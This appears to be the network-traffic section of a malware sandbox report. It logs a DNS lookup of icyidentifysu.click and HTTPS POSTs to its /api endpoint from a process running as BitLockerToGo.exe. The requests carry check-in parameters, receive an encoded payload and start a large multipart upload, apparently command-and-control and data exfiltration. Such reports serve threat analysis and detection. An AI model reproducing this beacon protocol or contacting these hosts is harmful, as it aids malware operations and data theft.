                                                                                  Dec 24, 2024 02:56:45.142524004 CET49765443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:45.142563105 CET44349765104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:46.356684923 CET44349765104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:46.356781006 CET49765443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:46.358197927 CET49765443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:46.358207941 CET44349765104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:46.358531952 CET44349765104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:46.359853029 CET49765443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:46.359972000 CET49765443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:46.359977961 CET44349765104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:47.168437958 CET44349765104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:47.168555021 CET44349765104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:47.168627977 CET49765443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:47.168742895 CET49765443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:47.168788910 CET44349765104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:47.661575079 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:47.661606073 CET44349771104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:47.661679029 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:47.662017107 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:47.662033081 CET44349771104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:48.876091003 CET44349771104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:48.876162052 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:48.877439976 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:48.877454996 CET44349771104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:48.877775908 CET44349771104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:48.879275084 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:48.880033016 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:48.880069971 CET44349771104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:48.880170107 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:48.880204916 CET44349771104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:48.880306005 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:48.880369902 CET44349771104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:48.880481958 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:48.880506039 CET44349771104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:48.880631924 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:48.880656958 CET44349771104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:48.880800962 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:48.880825043 CET44349771104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:48.880848885 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:48.881083965 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:48.881114006 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:48.923337936 CET44349771104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:48.923485994 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:48.923532963 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:48.923547029 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:48.971332073 CET44349771104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:48.971599102 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:48.971643925 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:48.971669912 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:49.015360117 CET44349771104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:49.018261909 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:49.059334993 CET44349771104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:49.240740061 CET44349771104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:51.286396027 CET44349771104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:51.286498070 CET44349771104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:51.286566973 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:51.286675930 CET49771443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:51.286688089 CET44349771104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:51.322452068 CET49781443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:51.322489023 CET44349781104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:51.322593927 CET49781443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:51.322906971 CET49781443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:51.322921038 CET44349781104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:52.541307926 CET44349781104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:52.541408062 CET49781443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:52.542773008 CET49781443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:52.542785883 CET44349781104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:52.543132067 CET44349781104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:52.544365883 CET49781443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:52.544406891 CET49781443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:52.544452906 CET44349781104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:57:00.470799923 CET44349781104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:57:00.470921040 CET44349781104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:57:00.471129894 CET49781443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:57:00.471340895 CET49781443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:57:00.471349955 CET44349781104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:57:00.471375942 CET49781443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:57:00.471379995 CET44349781104.21.29.252192.168.2.5
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 24, 2024 02:56:30.356976986 CET5809353192.168.2.51.1.1.1
                                                                                  Dec 24, 2024 02:56:30.684155941 CET53580931.1.1.1192.168.2.5
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Dec 24, 2024 02:56:30.356976986 CET192.168.2.51.1.1.10xf849Standard query (0)icyidentifysu.clickA (IP address)IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Dec 24, 2024 02:56:30.684155941 CET1.1.1.1192.168.2.50xf849No error (0)icyidentifysu.click104.21.29.252A (IP address)IN (0x0001)false
                                                                                  Dec 24, 2024 02:56:30.684155941 CET1.1.1.1192.168.2.50xf849No error (0)icyidentifysu.click172.67.150.24A (IP address)IN (0x0001)false
                                                                                  • icyidentifysu.click
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.549725104.21.29.2524435448C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-24 01:56:32 UTC266OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 8
                                                                                  Host: icyidentifysu.click
                                                                                  2024-12-24 01:56:32 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                  Data Ascii: act=life
                                                                                  2024-12-24 01:56:33 UTC1128INHTTP/1.1 200 OK
                                                                                  Date: Tue, 24 Dec 2024 01:56:32 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=voreunmcrhfpv7461qohrrl6rk; expires=Fri, 18 Apr 2025 19:43:11 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  X-Frame-Options: DENY
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pY5OPHKx3ZhQ3usKwKD1OIC9q%2BLjuV4PV%2FmGp7jtODxAa5JcQArUZneqj6Izr9rsTCqtaXsLqV%2FRxeoEjV1Mc%2FsKNMdTymAObrNzOhKLnFp0nFwTGRfqQxBqGB3kxZ1BFKdnBYc2"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8f6cf9b6ab5d43ef-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1760&min_rtt=1612&rtt_var=710&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2852&recv_bytes=910&delivery_rate=1811414&cwnd=237&unsent_bytes=0&cid=7320840f61a30c0a&ts=1115&x=0"
                                                                                  2024-12-24 01:56:33 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                  Data Ascii: 2ok
                                                                                  2024-12-24 01:56:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.549736104.21.29.2524435448C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-24 01:56:34 UTC267OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 54
                                                                                  Host: icyidentifysu.click
                                                                                  2024-12-24 01:56:34 UTC54OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 69 79 63 70 6a 6e 61 66 73 63 66 7a 26 6a 3d
                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--iycpjnafscfz&j=
                                                                                  2024-12-24 01:56:35 UTC1129INHTTP/1.1 200 OK
                                                                                  Date: Tue, 24 Dec 2024 01:56:34 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=8o2tmq9mtl4cr59p43bj7sl1ic; expires=Fri, 18 Apr 2025 19:43:13 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  X-Frame-Options: DENY
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fG8p5FXK03M0RNVX0zjy2YEcO%2FaaoCFNC%2BrwRA3D0XFrwDfBu7X4ooTPw3nJgLYvb8tYGz56tV4nWMrpI8yHoeOgY1%2FEe%2F9IoaYblFTs8OHoVCrwV%2FIyWSICmxQWNOz3K6mIxLIr"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8f6cf9c3bc0aef9f-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1779&min_rtt=1772&rtt_var=678&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2851&recv_bytes=957&delivery_rate=1596500&cwnd=216&unsent_bytes=0&cid=5af8539bcc5e33af&ts=790&x=0"
                                                                                  2024-12-24 01:56:35 UTC240INData Raw: 34 36 64 0d 0a 33 54 39 50 4b 35 41 6f 41 6e 79 4f 4e 33 56 66 54 6f 6d 63 72 54 72 63 34 6e 50 46 75 50 79 72 49 56 63 78 47 71 62 32 66 41 57 6d 48 54 6b 4a 71 68 77 75 58 76 31 53 56 32 55 36 2b 2b 6e 49 46 76 36 44 46 2b 65 43 6d 73 70 4e 4a 46 51 32 68 49 41 52 4a 2b 64 5a 4c 6b 66 6a 54 53 35 65 36 30 39 58 5a 52 58 79 76 73 68 55 2f 74 68 52 6f 4e 4b 65 79 6b 30 31 55 48 48 4a 68 68 42 6d 74 56 4d 6f 51 2f 56 4c 5a 68 33 69 57 68 41 36 4b 2b 6a 32 77 31 4f 78 69 68 37 6e 6c 4e 37 4f 57 33 55 4c 4f 4f 75 54 43 47 53 51 58 6a 78 41 73 6c 55 75 42 36 78 53 47 33 31 30 71 2f 33 49 57 4c 43 45 46 36 37 51 6c 4d 4e 46 4e 46 56 77 31 70 38 61 62 62 56 64 4b 30 4c 2f 51 6e 49 51 36 46 30 62 50 43 48 6f 76 6f 45
                                                                                  Data Ascii: 46d3T9PK5AoAnyON3VfTomcrTrc4nPFuPyrIVcxGqb2fAWmHTkJqhwuXv1SV2U6++nIFv6DF+eCmspNJFQ2hIARJ+dZLkfjTS5e609XZRXyvshU/thRoNKeyk01UHHJhhBmtVMoQ/VLZh3iWhA6K+j2w1Oxih7nlN7OW3ULOOuTCGSQXjxAslUuB6xSG310q/3IWLCEF67QlMNFNFVw1p8abbVdK0L/QnIQ6F0bPCHovoE
                                                                                  2024-12-24 01:56:35 UTC900INData Raw: 59 75 5a 68 52 2f 35 72 4e 2b 30 41 6b 51 6d 33 4a 68 42 67 6e 6f 42 4d 30 43 66 56 47 49 45 61 73 58 52 73 7a 4b 65 6a 78 79 46 6d 2b 6b 68 36 6e 32 5a 62 42 52 7a 39 63 64 38 75 61 46 47 43 33 56 43 70 47 39 55 4a 6d 45 65 38 56 57 58 30 72 38 37 36 58 47 4a 36 51 45 71 54 4f 6b 39 67 44 4b 68 31 68 68 4a 4d 53 4a 2b 63 64 4b 30 66 7a 52 32 41 4d 35 46 34 63 4f 44 37 67 39 38 4a 56 76 6f 30 62 71 4e 6d 65 7a 6b 6b 2f 58 48 4c 41 6d 52 4e 68 76 31 31 74 42 37 4a 4e 65 46 36 30 46 54 51 34 50 4f 7a 79 32 52 71 45 77 41 37 70 77 39 37 4f 54 33 55 4c 4f 4d 79 52 48 57 53 30 55 69 35 42 2b 56 68 67 44 4f 70 59 45 69 38 71 37 76 44 46 57 36 79 4b 48 36 48 5a 6c 38 4a 4b 4d 46 52 38 68 4e 70 65 59 4b 63 64 64 51 6e 54 52 32 73 53 35 6b 49 58 66 54 4f 6c 35 34
                                                                                  Data Ascii: YuZhR/5rN+0AkQm3JhBgnoBM0CfVGIEasXRszKejxyFm+kh6n2ZbBRz9cd8uaFGC3VCpG9UJmEe8VWX0r876XGJ6QEqTOk9gDKh1hhJMSJ+cdK0fzR2AM5F4cOD7g98JVvo0bqNmezkk/XHLAmRNhv11tB7JNeF60FTQ4POzy2RqEwA7pw97OT3ULOMyRHWS0Ui5B+VhgDOpYEi8q7vDFW6yKH6HZl8JKMFR8hNpeYKcddQnTR2sS5kIXfTOl54
                                                                                  2024-12-24 01:56:35 UTC1369INData Raw: 34 34 61 66 0d 0a 49 63 48 35 38 58 51 30 41 4d 79 58 7a 69 63 31 42 46 6f 73 46 55 74 53 50 5a 48 5a 42 2f 68 57 52 34 2b 49 4f 66 32 77 6c 53 36 6a 78 6d 76 32 5a 62 62 54 54 74 56 66 73 53 52 58 69 6e 2f 57 6a 55 4a 71 67 70 45 45 50 74 42 48 48 38 5a 36 50 44 42 58 36 6a 41 44 75 6e 44 33 73 35 50 64 51 73 34 79 70 6b 56 61 37 68 55 4c 45 72 79 51 47 34 52 35 6c 30 66 50 53 48 71 39 63 64 65 73 34 73 65 71 4e 32 57 79 6b 38 77 58 6e 75 45 32 6c 35 67 70 78 31 31 43 64 64 45 59 77 2f 39 46 79 49 2b 49 75 58 35 32 52 69 68 7a 67 6a 6e 33 5a 4b 4a 47 33 56 5a 66 38 4f 51 45 32 32 38 57 53 6c 45 2f 55 4e 70 46 2f 35 66 47 7a 4d 2b 35 76 54 4b 56 72 4b 46 48 71 66 62 6e 38 64 4a 50 68 4d 32 68 4a 4d 47 4a 2b 63 64 41 6b 54 69 57 47 6f 56 2f 52 63 69 50 69
                                                                                  Data Ascii: 44afIcH58XQ0AMyXzic1BFosFUtSPZHZB/hWR4+IOf2wlS6jxmv2ZbbTTtVfsSRXin/WjUJqgpEEPtBHH8Z6PDBX6jADunD3s5PdQs4ypkVa7hULEryQG4R5l0fPSHq9cdes4seqN2Wyk8wXnuE2l5gpx11CddEYw/9FyI+IuX52Rihzgjn3ZKJG3VZf8OQE228WSlE/UNpF/5fGzM+5vTKVrKFHqfbn8dJPhM2hJMGJ+cdAkTiWGoV/RciPi
                                                                                  2024-12-24 01:56:35 UTC1369INData Raw: 47 4a 47 44 42 36 32 61 67 59 64 61 64 56 52 30 68 4d 78 65 62 62 4e 5a 4c 6b 58 37 52 6d 30 66 36 46 49 61 4f 53 7a 74 2b 4d 70 5a 74 59 67 64 71 4e 43 53 7a 55 38 38 56 58 54 48 6c 78 67 6e 38 52 30 71 55 62 49 53 49 44 2f 68 58 68 73 39 4c 2f 72 35 6a 78 62 2b 6a 68 65 6e 6d 73 62 66 55 79 4a 55 5a 34 71 4e 58 6d 43 7a 48 58 55 4a 2b 46 68 6c 45 4f 68 66 45 6a 6b 67 34 66 37 4b 53 72 61 47 46 71 76 53 6d 38 5a 46 4d 46 35 2f 7a 35 63 4d 64 62 78 5a 49 30 57 79 42 43 41 5a 39 42 56 50 66 51 6e 38 2f 64 39 65 76 63 41 4f 36 63 50 65 7a 6b 39 31 43 7a 6a 45 6d 68 4a 73 75 46 59 6d 54 66 5a 4b 62 52 58 69 57 78 34 78 4a 4f 66 35 33 56 57 37 69 42 75 75 33 35 4c 45 51 43 64 51 65 59 54 61 58 6d 43 6e 48 58 55 4a 31 58 6c 58 50 61 78 4b 57 53 52 73 37 50 4b
                                                                                  Data Ascii: GJGDB62agYdadVR0hMxebbNZLkX7Rm0f6FIaOSzt+MpZtYgdqNCSzU88VXTHlxgn8R0qUbISID/hXhs9L/r5jxb+jhenmsbfUyJUZ4qNXmCzHXUJ+FhlEOhfEjkg4f7KSraGFqvSm8ZFMF5/z5cMdbxZI0WyBCAZ9BVPfQn8/d9evcAO6cPezk91CzjEmhJsuFYmTfZKbRXiWx4xJOf53VW7iBuu35LEQCdQeYTaXmCnHXUJ1XlXPaxKWSRs7PK
                                                                                  2024-12-24 01:56:35 UTC1369INData Raw: 42 4b 6f 30 64 37 57 44 53 77 54 66 38 6a 55 52 69 65 34 56 53 56 48 38 55 78 72 45 75 42 55 48 6a 73 70 34 2f 6e 41 58 37 65 48 45 61 48 49 6d 63 52 4b 4e 56 68 78 7a 70 41 66 62 50 38 54 62 55 37 71 43 6a 68 65 33 6c 49 42 4c 53 2b 72 34 59 46 42 2f 6f 63 64 35 34 4c 65 78 46 45 30 56 6d 72 41 6d 78 56 31 74 46 73 74 54 4f 42 4e 62 42 54 6a 56 68 38 77 4c 2b 50 73 7a 31 57 2b 6b 67 4f 68 30 5a 43 4a 44 58 56 55 59 49 54 4d 58 6c 61 6f 56 6d 31 57 76 46 4d 67 47 65 41 56 54 33 30 76 34 66 50 42 53 72 71 47 47 71 54 55 6c 73 78 4c 4d 56 6c 31 79 35 38 55 62 72 64 64 49 6b 7a 36 51 57 59 51 37 56 4d 62 4d 47 79 6c 76 73 68 41 2f 74 68 52 67 4d 43 54 7a 31 51 6b 5a 6e 2f 45 78 56 35 34 38 55 52 74 54 76 34 4b 4f 46 37 68 57 52 30 77 4b 65 2f 32 79 46 75 2f
                                                                                  Data Ascii: BKo0d7WDSwTf8jURie4VSVH8UxrEuBUHjsp4/nAX7eHEaHImcRKNVhxzpAfbP8TbU7qCjhe3lIBLS+r4YFB/ocd54LexFE0VmrAmxV1tFstTOBNbBTjVh8wL+Psz1W+kgOh0ZCJDXVUYITMXlaoVm1WvFMgGeAVT30v4fPBSrqGGqTUlsxLMVl1y58UbrddIkz6QWYQ7VMbMGylvshA/thRgMCTz1QkZn/ExV548URtTv4KOF7hWR0wKe/2yFu/
                                                                                  2024-12-24 01:56:35 UTC1369INData Raw: 32 53 69 52 74 31 58 58 58 43 6c 52 39 76 74 31 30 72 51 2f 5a 4a 61 52 33 72 58 42 45 32 4c 2b 48 78 79 46 36 36 67 42 71 67 31 4a 6a 4d 53 44 77 54 4e 6f 53 54 42 69 66 6e 48 51 74 71 34 46 68 53 45 4f 39 4f 56 79 4a 69 38 72 37 49 56 50 37 59 55 61 7a 53 6b 64 74 47 50 46 74 38 7a 5a 51 61 62 62 4a 61 4c 55 7a 2f 54 32 51 51 36 46 49 58 4d 53 50 73 39 73 42 63 76 6f 39 52 36 5a 71 5a 30 51 4e 74 45 31 6a 50 67 6a 39 70 74 45 39 74 56 72 78 54 49 42 6e 67 46 55 39 39 49 75 4c 2f 78 31 61 79 69 42 57 31 32 70 58 41 54 44 52 63 65 4d 65 56 46 47 2b 74 57 79 31 43 2b 6b 31 6f 47 75 4a 48 46 6a 4a 73 70 62 37 49 51 50 37 59 55 5a 62 4d 6d 63 35 4d 64 33 70 2f 33 35 55 55 5a 4c 52 52 62 56 61 38 55 79 41 5a 34 42 56 50 66 53 48 6e 38 38 74 4b 73 6f 41 52 72
                                                                                  Data Ascii: 2SiRt1XXXClR9vt10rQ/ZJaR3rXBE2L+HxyF66gBqg1JjMSDwTNoSTBifnHQtq4FhSEO9OVyJi8r7IVP7YUazSkdtGPFt8zZQabbJaLUz/T2QQ6FIXMSPs9sBcvo9R6ZqZ0QNtE1jPgj9ptE9tVrxTIBngFU99IuL/x1ayiBW12pXATDRceMeVFG+tWy1C+k1oGuJHFjJspb7IQP7YUZbMmc5Md3p/35UUZLRRbVa8UyAZ4BVPfSHn88tKsoARr
                                                                                  2024-12-24 01:56:35 UTC1369INData Raw: 49 4f 31 5a 35 79 4a 34 5a 61 61 31 63 4a 30 58 7a 54 57 63 56 2f 6c 34 46 4e 69 54 6f 38 4d 64 52 76 6f 34 52 70 74 65 65 69 51 31 31 56 47 43 45 7a 46 35 43 6e 45 6f 37 51 37 42 70 64 77 6a 6d 55 68 73 72 4a 2b 72 39 32 56 57 75 77 46 2f 6e 79 35 6e 59 41 32 31 46 61 4e 4f 54 41 53 6d 6d 48 53 70 46 73 68 49 67 46 65 4e 62 47 6a 59 6f 34 76 76 48 57 37 75 46 47 36 76 57 6e 38 46 4b 50 31 5a 39 77 70 34 64 61 62 42 63 49 55 33 37 52 47 6c 65 6f 68 55 51 4a 57 79 7a 76 76 6c 49 75 5a 67 63 74 35 69 73 79 6c 49 6b 52 6e 58 55 6b 6c 78 49 76 46 45 75 54 50 56 61 49 41 47 69 54 46 63 36 49 4b 75 6d 6a 31 69 36 6a 42 4b 67 31 4a 48 45 54 44 4a 59 64 38 36 61 44 47 69 36 56 53 46 42 2f 31 68 71 46 50 35 63 48 6a 41 69 34 2b 7a 4d 47 50 44 41 46 72 2b 61 78 6f
                                                                                  Data Ascii: IO1Z5yJ4Zaa1cJ0XzTWcV/l4FNiTo8MdRvo4RpteeiQ11VGCEzF5CnEo7Q7BpdwjmUhsrJ+r92VWuwF/ny5nYA21FaNOTASmmHSpFshIgFeNbGjYo4vvHW7uFG6vWn8FKP1Z9wp4dabBcIU37RGleohUQJWyzvvlIuZgct5isylIkRnXUklxIvFEuTPVaIAGiTFc6IKumj1i6jBKg1JHETDJYd86aDGi6VSFB/1hqFP5cHjAi4+zMGPDAFr+axo
                                                                                  2024-12-24 01:56:35 UTC1369INData Raw: 53 64 4b 5a 44 6d 53 36 57 68 4e 33 2f 45 31 30 47 65 4a 54 46 33 31 69 71 2f 47 50 41 49 66 41 57 65 66 6c 30 49 6c 62 64 51 73 34 38 5a 63 51 61 62 68 4c 50 41 54 52 58 58 59 55 39 78 63 78 4f 6a 33 69 36 4d 4a 4b 2f 73 35 52 6f 5a 72 47 6d 51 31 31 56 32 6d 45 7a 45 34 31 35 41 68 2b 48 71 49 59 66 31 44 31 46 51 46 39 64 4c 6d 77 6a 30 72 2b 32 46 48 67 32 59 7a 62 52 54 5a 46 65 34 4f 71 49 45 65 30 53 79 78 45 2b 55 5a 65 49 50 6c 57 47 54 4d 72 2f 65 2b 50 46 76 36 50 55 66 2f 6a 33 6f 45 44 43 68 30 34 33 4e 52 47 4a 34 70 65 49 30 66 31 58 48 46 54 7a 46 34 42 50 43 48 67 38 6f 31 5a 73 35 41 57 35 35 54 65 7a 77 4e 74 41 7a 61 45 6b 41 38 6e 35 77 31 2f 45 71 63 5a 4e 30 36 2b 53 6c 6b 6b 62 50 32 2b 6c 77 72 77 77 41 50 6e 67 74 36 4f 51 43 64
                                                                                  Data Ascii: SdKZDmS6WhN3/E10GeJTF31iq/GPAIfAWefl0IlbdQs48ZcQabhLPATRXXYU9xcxOj3i6MJK/s5RoZrGmQ11V2mEzE415Ah+HqIYf1D1FQF9dLmwj0r+2FHg2YzbRTZFe4OqIEe0SyxE+UZeIPlWGTMr/e+PFv6PUf/j3oEDCh043NRGJ4peI0f1XHFTzF4BPCHg8o1Zs5AW55TezwNtAzaEkA8n5w1/EqcZN06+SlkkbP2+lwrwwAPngt6OQCd
                                                                                  2024-12-24 01:56:35 UTC1369INData Raw: 52 31 6e 74 42 31 6a 43 66 51 4b 4f 45 79 69 46 52 4d 73 62 4c 4f 75 6e 51 50 72 30 30 62 33 69 49 47 48 57 6e 56 46 4f 4a 7a 47 55 43 65 74 48 58 55 4a 74 55 6c 79 44 4f 70 57 41 54 35 72 31 63 44 70 57 37 6d 47 45 71 6e 4e 6a 34 74 73 4e 6c 68 30 79 4a 4d 49 57 59 46 49 4c 6b 66 38 54 58 59 50 72 42 74 58 4d 6d 79 7a 78 34 39 4a 74 49 64 64 37 35 61 50 32 6b 30 2b 52 58 2b 45 71 31 41 6e 70 78 31 31 43 63 64 4a 62 68 44 72 51 77 5a 77 43 75 6a 35 79 56 75 77 6c 77 44 6e 6c 4e 37 50 41 32 30 42 4e 6f 53 51 44 79 66 6e 44 58 38 53 70 78 6b 33 54 72 35 4b 57 53 52 73 2f 62 36 58 43 2f 44 41 41 2b 65 43 33 6f 35 4e 4f 46 4a 37 79 70 63 4d 64 62 6c 65 4f 30 71 31 64 46 34 37 34 56 67 53 4d 79 76 56 77 4f 35 53 72 6f 30 65 6f 4f 53 67 2f 6c 49 79 51 7a 72 69
                                                                                  Data Ascii: R1ntB1jCfQKOEyiFRMsbLOunQPr00b3iIGHWnVFOJzGUCetHXUJtUlyDOpWAT5r1cDpW7mGEqnNj4tsNlh0yJMIWYFILkf8TXYPrBtXMmyzx49JtIdd75aP2k0+RX+Eq1Anpx11CcdJbhDrQwZwCuj5yVuwlwDnlN7PA20BNoSQDyfnDX8Spxk3Tr5KWSRs/b6XC/DAA+eC3o5NOFJ7ypcMdbleO0q1dF474VgSMyvVwO5Sro0eoOSg/lIyQzri


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.549742104.21.29.2524435448C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-24 01:56:36 UTC278OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=N3WY1YHRYDY
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 12800
                                                                                  Host: icyidentifysu.click
